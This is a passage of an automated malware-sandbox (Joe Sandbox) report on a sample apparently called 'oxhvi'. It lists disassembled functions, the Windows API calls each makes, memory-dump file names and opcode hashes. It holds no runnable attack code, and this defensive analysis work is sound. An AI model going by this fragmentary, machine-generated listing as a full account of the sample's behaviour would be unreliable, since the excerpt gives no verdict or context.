                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0059CA00
                                                                                                                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0059CA21
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                      • String ID: 0
                                                                                                                                                      • API String ID: 1460738036-4108050209
                                                                                                                                                      • Opcode ID: f96b0cacfd20d24c08b6e5e02424fdf19e52a5d1c945006fbc55260910dfb82b
                                                                                                                                                      • Instruction ID: 2dbe4124763fc486a1e5d15c0aef7ccc0fba95cd14aacfa327efa51e2feb5e70
                                                                                                                                                      • Opcode Fuzzy Hash: f96b0cacfd20d24c08b6e5e02424fdf19e52a5d1c945006fbc55260910dfb82b
                                                                                                                                                      • Instruction Fuzzy Hash: A76167B090025AAFDF15CF68C998EAEBFB9FF45308F044569E841A3291D734AE45DB70
                                                                                                                                                      Function 005C4382 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 182windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 005C43FC
                                                                                                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 005C43FF
                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 005C4426
                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 005C4449
                                                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 005C44C1
                                                                                                                                                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 005C450B
                                                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 005C4526
                                                                                                                                                      • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 005C4541
                                                                                                                                                      • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 005C4555
                                                                                                                                                      • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 005C4572
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$LongWindow
                                                                                                                                                      • String ID: Hb
                                                                                                                                                      • API String ID: 312131281-1270690246
                                                                                                                                                      • Opcode ID: 8159b26254c7e8b8a687f4e5b7be996963738b517491a05861d39f18743ec808
                                                                                                                                                      • Instruction ID: 06f123e3dacbe64aa924103d9ff0e0105738b4f739e3fdd59a0c057582226abe
                                                                                                                                                      • Opcode Fuzzy Hash: 8159b26254c7e8b8a687f4e5b7be996963738b517491a05861d39f18743ec808
                                                                                                                                                      • Instruction Fuzzy Hash: 27615575900209AFDB11CFA8CC95FEE7BB8FB49710F10416AFA14A72A1C770AA45DF60
                                                                                                                                                      Function 0059E3D7 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0059E3E9
                                                                                                                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0059E40F
                                                                                                                                                      • _wcslen.LIBCMT ref: 0059E419
                                                                                                                                                      • _wcsstr.LIBVCRUNTIME ref: 0059E469
                                                                                                                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0059E485
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                      • API String ID: 1939486746-1459072770
                                                                                                                                                      • Opcode ID: 843c08015d653127b54f3578a50916a53517d3d463146656ca7f170d9bf96ce9
                                                                                                                                                      • Instruction ID: eb221102eb204efe54a04a11375bb10c77c21732e2ea796a9eb488f7bb5d3c96
                                                                                                                                                      • Opcode Fuzzy Hash: 843c08015d653127b54f3578a50916a53517d3d463146656ca7f170d9bf96ce9
                                                                                                                                                      • Instruction Fuzzy Hash: 9841F6725406157BEB00AA649C4BEBF3FACFF95311F10042AFD04A6182EA789A0596B1
                                                                                                                                                      Function 005A4678 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 005A469A
                                                                                                                                                      • _wcslen.LIBCMT ref: 005A46C7
                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 005A46F7
                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 005A4718
                                                                                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 005A4728
                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 005A47AF
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 005A47BA
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 005A47C5
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                      • String ID: :$\$\??\%s
                                                                                                                                                      • API String ID: 1149970189-3457252023
                                                                                                                                                      • Opcode ID: d4265e2b44019f498cb87bfb425167f56985fad000c099901594c0d9bb77a644
                                                                                                                                                      • Instruction ID: 26329442aa7860465bcc5caf9b17e5b11abb450d1d249f88fc58aceb17436b1e
                                                                                                                                                      • Opcode Fuzzy Hash: d4265e2b44019f498cb87bfb425167f56985fad000c099901594c0d9bb77a644
                                                                                                                                                      • Instruction Fuzzy Hash: 8131807590025AABDB219BA0DC48FEF3BBCFF8A741F1041BAF605D6060E7B496459B24
                                                                                                                                                      Function 0059A86D Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 0059A8EE
                                                                                                                                                      • SetKeyboardState.USER32(?), ref: 0059A959
                                                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 0059A979
                                                                                                                                                      • GetKeyState.USER32(000000A0), ref: 0059A990
                                                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 0059A9BF
                                                                                                                                                      • GetKeyState.USER32(000000A1), ref: 0059A9D0
                                                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 0059A9FC
                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 0059AA0A
                                                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 0059AA33
                                                                                                                                                      • GetKeyState.USER32(00000012), ref: 0059AA41
                                                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 0059AA6A
                                                                                                                                                      • GetKeyState.USER32(0000005B), ref: 0059AA78
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 541375521-0
                                                                                                                                                      • Opcode ID: a211e82d3b19c3fae706e032d83d154a81a537f5cad19599dbd51d0b04f52b53
                                                                                                                                                      • Instruction ID: ba37b29d5cb0e3fcb622c63850ab40b2a3234f38ba03757388e6c8f6484949c0
                                                                                                                                                      • Opcode Fuzzy Hash: a211e82d3b19c3fae706e032d83d154a81a537f5cad19599dbd51d0b04f52b53
                                                                                                                                                      • Instruction Fuzzy Hash: 1B51E7309047856AFF35E7B089547AABFB4BF51340F088599C5C65B1C2DA549A4CC7B3
                                                                                                                                                      Function 00596555 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00596571
                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0059658A
                                                                                                                                                      • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 005965E8
                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 005965F8
                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0059660A
                                                                                                                                                      • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 0059665E
                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0059666C
                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0059667E
                                                                                                                                                      • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 005966C0
                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 005966D3
                                                                                                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 005966E9
                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 005966F6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3096461208-0
                                                                                                                                                      • Opcode ID: c88b4b327502dce553c2d873ad1b3e480d76107905eff2894936860cd6b42bc2
                                                                                                                                                      • Instruction ID: e3d8fa36572613785c7d7c095e7a8e64f1a48ca13fc4fe5f37d0c032ebaa2346
                                                                                                                                                      • Opcode Fuzzy Hash: c88b4b327502dce553c2d873ad1b3e480d76107905eff2894936860cd6b42bc2
                                                                                                                                                      • Instruction Fuzzy Hash: 2C510CB1A00605AFDF08CF68DD99AAEBBB5FB58300F108139F919E6290D770AD44CB60
                                                                                                                                                      Function 005CA8E5 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 260windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00532441: GetWindowLongW.USER32(00000000,000000EB), ref: 00532452
                                                                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 005CA926
                                                                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 005CA946
                                                                                                                                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 005CAB83
                                                                                                                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 005CABA1
                                                                                                                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 005CABC2
                                                                                                                                                      • ShowWindow.USER32(00000003,00000000), ref: 005CABE1
                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 005CAC06
                                                                                                                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 005CAC29
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                                                      • String ID: $Hb
                                                                                                                                                      • API String ID: 1211466189-1131636505
                                                                                                                                                      • Opcode ID: bf34b83d06c47ac624379ce326952b47aed104800582ebe27bc04b8c72d2ade0
                                                                                                                                                      • Instruction ID: a2ccc55f35d6e3d851da0975506ba8ed5e8b71b4a921fc62b586800335b65e1d
                                                                                                                                                      • Opcode Fuzzy Hash: bf34b83d06c47ac624379ce326952b47aed104800582ebe27bc04b8c72d2ade0
                                                                                                                                                      • Instruction Fuzzy Hash: 68B17A31600219DFDF14CFA9C985BAE7FB2FF84709F198069ED499A295D730AD80CB61
                                                                                                                                                      Function 005C45A5 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CreateMenu.USER32 ref: 005C45D8
                                                                                                                                                      • SetMenu.USER32(?,00000000), ref: 005C45E7
                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005C466F
                                                                                                                                                      • IsMenu.USER32(?), ref: 005C4683
                                                                                                                                                      • CreatePopupMenu.USER32 ref: 005C468D
                                                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 005C46BA
                                                                                                                                                      • DrawMenuBar.USER32 ref: 005C46C2
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                      • String ID: 0$F$Hb
                                                                                                                                                      • API String ID: 161812096-2206038376
                                                                                                                                                      • Opcode ID: ba0924bb75b4fa7130b0714811019d2fc729906439ade4803c15d54a270eb1d5
                                                                                                                                                      • Instruction ID: eac5d23164ce01cb2e962f3bd78e9e5d5177ab0b2f35979a03a4f1d6af11aec8
                                                                                                                                                      • Opcode Fuzzy Hash: ba0924bb75b4fa7130b0714811019d2fc729906439ade4803c15d54a270eb1d5
                                                                                                                                                      • Instruction Fuzzy Hash: 8D414AB5601219AFDB14CFA4D868FAA7BB5FF4A314F14002CFA4597350C735A964DF60
                                                                                                                                                      Function 005C48F7 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 005C499A
                                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 005C49A1
                                                                                                                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 005C49B4
                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 005C49BC
                                                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 005C49C7
                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 005C49D1
                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 005C49DB
                                                                                                                                                      • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 005C49F1
                                                                                                                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 005C49FD
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                      • String ID: static
                                                                                                                                                      • API String ID: 2559357485-2160076837
                                                                                                                                                      • Opcode ID: 1d245dabd42634e6b8f5c99114934ed5c4e9d76fe8399d422ea67e4525c3b466
                                                                                                                                                      • Instruction ID: f940644ab8cac8c0bbf30de2a79ca2ef98cc93d1fe81450bc739083eaddf8c3d
                                                                                                                                                      • Opcode Fuzzy Hash: 1d245dabd42634e6b8f5c99114934ed5c4e9d76fe8399d422ea67e4525c3b466
                                                                                                                                                      • Instruction Fuzzy Hash: AE313A32100619AFDF119FA4DC08FEA3FA9FF19724F110229FA55E60A0D735D815EB64
                                                                                                                                                      Function 005B458D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 005B45B9
                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 005B45E7
                                                                                                                                                      • CoUninitialize.OLE32 ref: 005B45F1
                                                                                                                                                      • _wcslen.LIBCMT ref: 005B468A
                                                                                                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 005B470E
                                                                                                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 005B4832
                                                                                                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 005B486B
                                                                                                                                                      • CoGetObject.OLE32(?,00000000,005D0B64,?), ref: 005B488A
                                                                                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 005B489D
                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 005B4921
                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 005B4935
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 429561992-0
                                                                                                                                                      • Opcode ID: b69171f1618c6fd10de34702c568f96cadfed1460c25e03e9d70b4eba98e13ff
                                                                                                                                                      • Instruction ID: 9c394f5d9e0d5a2d1846f38a46b49458794467bae3a8ee93a8df6f191856b622
                                                                                                                                                      • Opcode Fuzzy Hash: b69171f1618c6fd10de34702c568f96cadfed1460c25e03e9d70b4eba98e13ff
                                                                                                                                                      • Instruction Fuzzy Hash: 24C12371608305AFD710DF68C8849ABBBE9FF89748F14491DF98A9B251DB30ED06CB52
                                                                                                                                                      Function 005A83F0 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 005A844D
                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 005A84E9
                                                                                                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 005A84FD
                                                                                                                                                      • CoCreateInstance.OLE32(005D0CD4,00000000,00000001,005F7E8C,?), ref: 005A8549
                                                                                                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 005A85CE
                                                                                                                                                      • CoTaskMemFree.OLE32(?,?), ref: 005A8626
                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 005A86B1
                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 005A86D4
                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 005A86DB
                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 005A8730
                                                                                                                                                      • CoUninitialize.OLE32 ref: 005A8736
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2762341140-0
                                                                                                                                                      • Opcode ID: 1894729b516d61158580f1816c236104ff294d5d1d6aa849a185385da8bb611b
                                                                                                                                                      • Instruction ID: 799580893f6013393c25206e550047bafdc15b88bcc1ae4c6fa32a17ca046e66
                                                                                                                                                      • Opcode Fuzzy Hash: 1894729b516d61158580f1816c236104ff294d5d1d6aa849a185385da8bb611b
                                                                                                                                                      • Instruction Fuzzy Hash: 97C10C75A00609AFDB14DFA4C888DAEBBF5FF49304B1484A8F519EB261DB31ED45CB50
                                                                                                                                                      Function 00590318 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0059033F
                                                                                                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00590398
                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 005903AA
                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 005903CA
                                                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 0059041D
                                                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00590431
                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00590446
                                                                                                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00590453
                                                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0059045C
                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0059046E
